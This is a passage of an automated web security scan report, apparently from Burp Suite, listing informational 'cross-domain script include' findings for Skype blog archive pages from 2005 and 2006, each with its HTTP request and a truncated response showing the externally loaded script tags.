<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.12. http://blogs.skype.com/en/2005/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 412787
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.13. http://blogs.skype.com/en/2005/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 362300
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.14. http://blogs.skype.com/en/2005/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/10/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:54 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 301665
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.15. http://blogs.skype.com/en/2005/11/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/11/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/11/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:52 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 342969
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.16. http://blogs.skype.com/en/2005/12/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/12/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2005/12/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:51 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 504735
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.17. http://blogs.skype.com/en/2006/01/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/01/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/01/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:48 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 341005
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.18. http://blogs.skype.com/en/2006/02/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/02/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/02/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:47 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 345891
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.19. http://blogs.skype.com/en/2006/03/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/03/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/03/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:45 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 403234
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.20. http://blogs.skype.com/en/2006/04/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/04/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/04/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:43 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 250170
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.21. http://blogs.skype.com/en/2006/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/05/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:41 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 790051
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.22. http://blogs.skype.com/en/2006/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/06/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:39 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 451171
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.23. http://blogs.skype.com/en/2006/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/07/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:37 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 338410
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.24. http://blogs.skype.com/en/2006/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/08/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:35 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 371498
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.25. http://blogs.skype.com/en/2006/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/09/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 248309
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/skype-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/yahoo-dom-event.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/swfobject.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/jquery/jquery-1.4.2.min.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>
<script src="http://bit.ly/javascript-api.js?version=latest&amp;login=skype&amp;apiKey=R_543de107069b417f1cf84b0efa65c8a9" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
</script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-core.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/s_code.js" type="text/javascript" charset="utf-8"></script>
<script src="http://www.skypeassets.com/i/js/wanalytics/wa-blogs.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

18.26. http://blogs.skype.com/en/2006/10/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2006/10/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /en/2006/10/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:32 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 198595
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</script>
